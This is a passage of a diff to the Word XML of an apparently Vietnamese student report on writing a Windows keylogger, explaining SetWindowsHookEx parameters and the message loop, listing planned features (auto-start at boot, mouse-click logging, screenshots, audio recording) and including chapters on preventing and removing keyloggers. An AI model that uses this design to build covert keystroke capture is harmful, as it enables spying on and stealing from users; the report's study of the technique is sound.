-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve">- </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Một tham số </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve">HINSTANCE: Một xử lý tới DLL chứa thủ tục hook được tham số </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve">(HOOKPROC)GetKey </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve">trỏ tới. Tham số </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>này</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> phải được đặt thành NULL nếu tham số dwThreadId chỉ định một luồng được tạo bởi quy trình hiện tại và nếu thủ tục hook nằm trong mã được liên kết với quy trình hiện tại</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Trong trường hợp này, dwThreadId trả về giá trị là 0, tham số này được đặt là GetModuleHandle(NULL) trả về một handle cho tệp được sử dụng để tạo quá trình gọi.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:firstLine="720"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve">- dwThreadId: Định danh của luồng mà thủ tục hook được liên kết với. Đối với các ứng dụng dành cho </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>PC</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, nếu tham số này bằng 0 thì quy trình hook được liên kết với tất cả các chuỗi hiện có đang chạy trong cùng một </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>PC</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> như chuỗi gọi.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:firstLine="720"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>Tiếp theo ta tạo một vòng lặp message.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:firstLine="720"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Sau khi mọi thứ ở trên được khởi tạo, vòng lặp Message sẽ “bắt” các thông tin </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>người dùng thực hiện với</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> window</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>s</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> và thực hiện nó</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:firstLine="720"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>GetMessage() là hàm lấy thông tin từ message queue, khi tương tác với hệ thống, các tương tác được máy hiểu là các message và lưu vào một queue trong hệ thống, vòng lặp sẽ bắt các message này từ hệ thống.</w:t>
       </w:r>
     </w:p>
@@ -14742,7 +17489,7 @@
           <w:szCs w:val="28"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="27" w:name="_Toc57761774"/>
+      <w:bookmarkStart w:id="28" w:name="_Toc60895364"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -14752,9 +17499,31 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>2.4. Build chương trình</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="27"/>
+        <w:t>2.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="auto"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>5</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="auto"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>. Build chương trình</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="28"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -14900,7 +17669,7 @@
           <w:szCs w:val="28"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="28" w:name="_Toc57761775"/>
+      <w:bookmarkStart w:id="29" w:name="_Toc60895365"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -14910,6 +17679,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>2.</w:t>
       </w:r>
       <w:r>
@@ -14934,7 +17704,7 @@
         </w:rPr>
         <w:t>. Những hướng phát triển của Project</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="28"/>
+      <w:bookmarkEnd w:id="29"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -14990,7 +17760,23 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>- Hoàn thành nốt những phím đặc biệt như: F1..F12, Insert, PageUp, PageDown, NumLock, CapsLock,...</w:t>
+        <w:t>- Hoàn thành nốt những phím đặc biệt như: F1</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>…</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>F12, Insert, PageUp, PageDown, NumLock, CapsLock,...</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -15009,6 +17795,25 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
+        <w:t>- Nhận biết xem người dùng đã click vào nút nào trên cửa sổ.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="720"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
         <w:t>- Keylogger này sẽ tự động chạy khi máy khởi động</w:t>
       </w:r>
     </w:p>
@@ -15074,8 +17879,23 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>- Ngoài việc ghi nhận phím người dùng nhập vào, nó có thể chụp màn hình, ghi âm những gì người dùng nói,..</w:t>
+        <w:t>- Ngoài việc ghi nhận phím người dùng nhập vào</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> và sự kiện click chuột</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>, nó có thể chụp màn hình, ghi âm những gì người dùng nói,..</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -15110,7 +17930,7 @@
           <w:szCs w:val="28"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="29" w:name="_Toc57761776"/>
+      <w:bookmarkStart w:id="30" w:name="_Toc60895366"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -15123,7 +17943,7 @@
         <w:lastRenderedPageBreak/>
         <w:t>*/ Tiểu kết chương 2:</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="29"/>
+      <w:bookmarkEnd w:id="30"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -15218,7 +18038,7 @@
           <w:szCs w:val="28"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="30" w:name="_Toc57761777"/>
+      <w:bookmarkStart w:id="31" w:name="_Toc60895367"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -15242,7 +18062,7 @@
         </w:rPr>
         <w:t>PHƯƠNG PHÁP PHÒNG CHỐNG MÃ ĐỘC</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="30"/>
+      <w:bookmarkEnd w:id="31"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -15269,7 +18089,7 @@
           <w:szCs w:val="28"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="31" w:name="_Toc57761778"/>
+      <w:bookmarkStart w:id="32" w:name="_Toc60895368"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -15281,7 +18101,7 @@
         </w:rPr>
         <w:t>3.1. Các phương pháp phòng tránh mã độc hiệu quả</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="31"/>
+      <w:bookmarkEnd w:id="32"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -16056,7 +18876,7 @@
           <w:szCs w:val="28"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="32" w:name="_Toc57761779"/>
+      <w:bookmarkStart w:id="33" w:name="_Toc60895369"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -16090,7 +18910,7 @@
         </w:rPr>
         <w:t>. Cách xóa Keylogger khỏi máy tính</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="32"/>
+      <w:bookmarkEnd w:id="33"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -16272,7 +19092,7 @@
           <w:szCs w:val="28"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="33" w:name="_Toc57761780"/>
+      <w:bookmarkStart w:id="34" w:name="_Toc60895370"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -16285,7 +19105,7 @@
         <w:lastRenderedPageBreak/>
         <w:t>*/ Tiểu kết chương 3:</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="33"/>
+      <w:bookmarkEnd w:id="34"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -16372,8 +19192,8 @@
           <w:szCs w:val="28"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="34" w:name="_Toc43674119"/>
-      <w:bookmarkStart w:id="35" w:name="_Toc57761781"/>
+      <w:bookmarkStart w:id="35" w:name="_Toc43674119"/>
+      <w:bookmarkStart w:id="36" w:name="_Toc60895371"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -16386,8 +19206,8 @@
         <w:lastRenderedPageBreak/>
         <w:t>KẾT LUẬN</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="34"/>
       <w:bookmarkEnd w:id="35"/>
+      <w:bookmarkEnd w:id="36"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -16452,7 +19272,39 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>Keylogger có thể tốt hoặc xấu, và nó tốt hoặc xấu thì còn phụ thuộc vào mục đích sử dụng, Nếu keylogger được dùng phục vụ cho việc giám sát con cái, giám sát thiết bị ở công ty, xem họ đã làm đã làm gì với thiết bị PC thì được coi là tốt, Còn với mục đích sử dụng keylogger với mục đích ăn cắp thông tin của người dùng thì được coi là cực kỳ xấu xa.</w:t>
+        <w:t xml:space="preserve">Keylogger có thể tốt hoặc xấu, và nó tốt hoặc xấu thì còn phụ thuộc vào mục đích sử dụng, Nếu keylogger được dùng phục vụ cho việc giám sát con cái, giám sát thiết bị ở công ty, xem họ đã làm đã làm gì với thiết bị PC thì được coi là tốt, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>c</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">òn với mục đích sử dụng keylogger </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>là</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> ăn cắp thông tin của người dùng thì được coi là cực kỳ xấu xa.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -16560,8 +19412,8 @@
           <w:szCs w:val="28"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="36" w:name="_Toc43674120"/>
-      <w:bookmarkStart w:id="37" w:name="_Toc57761782"/>
+      <w:bookmarkStart w:id="37" w:name="_Toc43674120"/>
+      <w:bookmarkStart w:id="38" w:name="_Toc60895372"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -16574,8 +19426,8 @@
         <w:lastRenderedPageBreak/>
         <w:t>TÀI LIỆU THAM KHẢO</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="36"/>
       <w:bookmarkEnd w:id="37"/>
+      <w:bookmarkEnd w:id="38"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -16818,8 +19670,8 @@
           <w:szCs w:val="28"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="38" w:name="_Toc43674121"/>
-      <w:bookmarkStart w:id="39" w:name="_Toc57761783"/>
+      <w:bookmarkStart w:id="39" w:name="_Toc43674121"/>
+      <w:bookmarkStart w:id="40" w:name="_Toc60895373"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -16832,8 +19684,8 @@
         <w:lastRenderedPageBreak/>
         <w:t>PHỤ LỤC</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="38"/>
       <w:bookmarkEnd w:id="39"/>
+      <w:bookmarkEnd w:id="40"/>
     </w:p>
     <w:p>
       <w:pPr>
